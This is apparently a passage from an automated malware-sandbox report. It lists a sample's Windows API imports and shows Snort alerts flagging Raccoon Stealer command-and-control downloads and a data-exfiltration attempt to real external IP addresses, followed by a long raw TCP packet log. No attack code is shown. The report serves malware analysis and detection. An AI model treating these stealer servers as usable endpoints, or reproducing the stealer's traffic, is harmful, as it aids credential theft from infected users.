                                                                                                                          KERNEL32.dllGetDriveTypeW, GetCPInfo, HeapAlloc, InterlockedIncrement, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, QueryDosDeviceA, GetNamedPipeHandleStateA, SetHandleInformation, FindFirstFileExW, LockFile, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, IsBadReadPtr, ActivateActCtx, GetPrivateProfileIntA, SetFileShortNameW, ReadConsoleInputA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, SetDllDirectoryA, GetSystemDirectoryA, CreateActCtxA, CompareStringW, GetStartupInfoW, VerifyVersionInfoW, TlsGetValue, GetLongPathNameW, SetLastError, GetProcAddress, FindVolumeMountPointClose, WriteProfileSectionA, GlobalGetAtomNameA, FindClose, GetPrivateProfileStringA, OpenWaitableTimerA, LocalAlloc, SetSystemTime, GetModuleFileNameA, FindFirstChangeNotificationA, GetProcessShutdownParameters, FreeEnvironmentStringsW, BuildCommDCBA, GetCurrentDirectoryA, CompareStringA, GetConsoleCursorInfo, TlsAlloc, GetWindowsDirectoryW, GetProfileSectionW, AreFileApisANSI, DeleteFileA, LocalFileTimeToFileTime, CloseHandle, SetStdHandle, GetLastError, GetConsoleAliasesLengthW, FlushFileBuffers, MoveFileA, GetCommandLineW, HeapSetInformation, InterlockedDecrement, DecodePointer, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, GetModuleFileNameW, WriteFile, GetStdHandle, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapValidate, TlsSetValue, TlsFree, HeapCreate, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryW, RtlUnwind, RaiseException, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, LCMapStringW, MultiByteToWideChar, GetStringTypeW, CreateFileW
                                                                                                                          USER32.dllGetMenuInfo
                                                                                                                          GDI32.dllGetBitmapBits
                                                                                                                          WINHTTP.dllWinHttpReadData

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          SpanishParaguay
                                                                                                                          Divehi; Dhivehi; MaldivianMaldives

                                                                                                                          Network Behavior

                                                                                                                          Snort IDS Alerts

                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                          10/29/21-17:07:26.129654TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4984580192.168.2.7194.180.174.181
                                                                                                                          10/29/21-17:07:33.695773TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4984580192.168.2.7194.180.174.181
                                                                                                                          10/29/21-17:07:34.864865TCP2033974ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt4984580192.168.2.7194.180.174.181

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 29, 2021 17:06:13.651132107 CEST4975080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:13.703418016 CEST8049750185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:13.703548908 CEST4975080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:13.703707933 CEST4975080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:13.703725100 CEST4975080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:13.755770922 CEST8049750185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:13.755892992 CEST8049750185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:13.782012939 CEST8049750185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:13.782138109 CEST4975080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:13.783754110 CEST4975080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:13.835774899 CEST8049750185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.083302975 CEST4975280192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.135226965 CEST8049752185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.135519981 CEST4975280192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.135543108 CEST4975280192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.135998964 CEST4975280192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.187150002 CEST8049752185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.187341928 CEST8049752185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.211994886 CEST8049752185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.212096930 CEST4975280192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.218348026 CEST4975280192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.269998074 CEST8049752185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.596352100 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.650468111 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.650614977 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.650727987 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.745770931 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793245077 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793278933 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793301105 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793318033 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793339014 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793360949 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793365002 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.793380976 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793395042 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.793405056 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793428898 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.793431044 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793451071 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.793454885 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.793530941 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.847397089 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847430944 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847450018 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847462893 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847481012 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847500086 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847517014 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847527027 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.847534895 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847593069 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.847618103 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847619057 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.847637892 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847656012 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847672939 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847681999 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.847692966 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847707987 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.847708941 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847728014 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847743988 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847755909 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.847762108 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847780943 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847798109 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847805023 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.847816944 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.847843885 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.847860098 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.901350021 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901382923 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901396990 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901416063 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901434898 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901456118 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901477098 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901501894 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901520014 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901534081 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901550055 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.901551962 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901571035 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.901643038 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.901957989 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902048111 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902066946 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902085066 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902098894 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902126074 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902170897 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902235031 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902252913 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902271032 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902288914 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902295113 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902306080 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902323961 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902339935 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902353048 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902357101 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902376890 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902393103 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902394056 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902412891 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902429104 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902446032 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902446985 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902477980 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902486086 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902498007 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902515888 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902534962 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902534962 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902554035 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902570963 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902573109 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902589083 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902604103 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.902604103 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902641058 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.902693033 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.914263010 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.914289951 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.914369106 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.955765009 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.955795050 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.955811024 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.955827951 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.955858946 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.955893040 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956309080 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956330061 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956350088 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956368923 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956372976 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956446886 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956450939 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956475973 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956499100 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956522942 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956525087 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956561089 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956607103 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956629038 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956650019 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956671000 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956677914 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956692934 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956713915 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956715107 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956737995 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956757069 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956759930 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956799030 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956801891 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956823111 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956866980 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.956876040 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956898928 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.956948996 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.957005978 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957031012 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957056046 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957077026 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957078934 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.957098961 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957120895 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957123041 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.957144022 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957160950 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.957165956 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957211018 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.957672119 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957695961 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957712889 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957731009 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957777023 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.957808971 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957832098 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957854986 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957876921 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957900047 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.957926989 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.957967997 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.957988977 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.958012104 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.958024025 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.958035946 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.958076000 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.958080053 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.958098888 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.958142996 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:14.968262911 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.968297958 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:14.968370914 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.009701967 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.009735107 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.009815931 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010040045 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010065079 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010085106 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010104895 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010107040 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010157108 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010251045 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010274887 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010296106 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010315895 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010323048 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010338068 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010354042 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010359049 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010395050 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010413885 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010436058 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010472059 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010489941 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010494947 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010515928 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010534048 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010552883 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010591030 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010593891 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010613918 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010634899 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010658026 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010915995 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010940075 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010961056 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.010962009 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.010987043 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011003971 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011009932 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011033058 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011049032 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011054039 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011075974 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011092901 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011096954 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011133909 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011528969 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011550903 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011573076 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011594057 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011600971 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011615992 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011632919 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011637926 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011662960 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011683941 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011699915 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011706114 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011729002 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011749983 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011759043 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011774063 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011794090 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011797905 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011816025 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011826038 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.011838913 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.011856079 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.022198915 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.022233963 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.022254944 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.022300959 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.022329092 CEST4975380192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:15.063745975 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.063781977 CEST8049753185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:15.063806057 CEST8049753185.98.87.159192.168.2.7
